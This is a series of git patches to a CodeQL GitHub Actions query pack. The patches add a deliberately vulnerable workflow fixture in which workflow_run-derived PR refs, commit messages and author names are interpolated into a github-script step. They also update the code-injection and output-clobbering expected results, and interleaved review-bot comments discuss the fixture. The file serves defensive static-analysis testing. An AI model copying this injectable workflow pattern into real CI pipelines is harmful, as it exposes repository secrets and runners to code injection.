codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e03e2a45cb72..fb4416ffb1d6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.66 +version: 0.1.67 groups: [actions, queries] suites: codeql-suites extractor: javascript From ff17d1dcb1d243238644816e59faae13edd84290 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:50:11 +0200 Subject: [PATCH 584/707] Add CmdI test --- ql/src/Debug/partial.ql | 4 +- .../CWE-094/.github/workflows/test16.yml | 231 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 27 ++ .../CWE-094/CodeInjectionMedium.expected | 23 ++ 4 files changed, 284 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql
index cb8ba7873d8c..c1578220b6be 100644
--- a/ql/src/Debug/partial.ql
+++ b/ql/src/Debug/partial.ql
@@ -18,7 +18,9 @@ import PartialFlow::PartialPathGraph
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
 source instanceof RemoteFlowSource and
- source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
+ //source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
+ source.getLocation().getFile().getBaseName() = "test16.yml" and
+ source.getLocation().getStartLine() = 125
 }
 
 predicate isSink(DataFlow::Node sink) { none() }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
new file mode 100644
index 000000000000..0b3002506a14
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
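Review bot: The new isSource body hard-codes `"test16.yml"` and `getStartLine() = 125` and keeps the previous filter only as the commented-out line `//source.getLocation().getFile().getBaseName() = "non-existant-test.yml"`, which reads as local debugging state carried along in a commit whose subject is adding a test. If this debug query is meant to be pointed at one source per investigation, the `"non-existant-test.yml"` placeholder should be restored before committing so the query selects nothing by default, and the dead comment dropped; otherwise a comment above the predicate stating that the file name and line are meant to be edited locally, and what line 125 of test16.yml is, would make the intent clear to the next person who runs it. The enclosing MyConfig module continues past the end of the hunk.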
@@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - 🎬 Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: 🧽 Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📠Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id 
}}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ 🥠🔠🥓 🥗 🥘 🌯 🚠🛠🖠🭠🧠ðŸ 🥪 🥖 ðŸª
+ Still cooking, please come back later
+ 🥙 🥮 🥨 🌭 🦠🙠🕠🰠🮠🜠🡠🱠🿠🕠🥟 +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: 📦 Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + 
uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: 📦 Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4c9ea8fe8ca4..699d53da9cc1 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
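Review bot: The new fixture carries no marker saying which step is the intended sink, unlike the sibling fixtures whose expected labels show `# VULNERABLE` comments in the run scripts (output1.yml / output2.yml in the OutputClobbering expected file); a reader of test16.yml has to reverse-engineer from the `.expected` diffs that the `Invoke deployment hook` step's `script:` interpolating `needs.setup.outputs.ref`, `needs.build-demo.outputs.commit-message` and `github.event.workflow_run.head_commit.author.name` is the target. Suggest `# VULNERABLE: workflow_run-derived values interpolated into github-script` above `- name: Invoke deployment hook`, regenerating the expected locations afterwards since the comment shifts line numbers. The `run:` lines of the `pr`/`ref`/`repo` steps appear truncated in this rendering (`echo "value=$(> $GITHUB_OUTPUT`), presumably a file read lost in extraction — worth confirming the committed file is intact, since the expected output places that line at columns 20–64. The commit title says "CmdI test" while every expectation added is for the CodeInjection queries; naming the intended query in the fixture comment would avoid that ambiguity.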
@@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | 
.github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | 
needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -596,6 +619,10 @@ subpaths | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 262912c58a5e..6d33d3cc5691 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | 
.github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | 
needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2e5379f289e88c64e6c151a7808ed898adea8dbf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 15:10:31 +0200 Subject: [PATCH 585/707] Update expected tests --- .../Security/CWE-074/OutputClobberingHigh.expected | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 715e2c4c90cc..af792f1ab65e 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
@@ -1,6 +1,6 @@ edges | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | 
.github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -24,7 +24,7 @@ nodes subpaths #select | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> 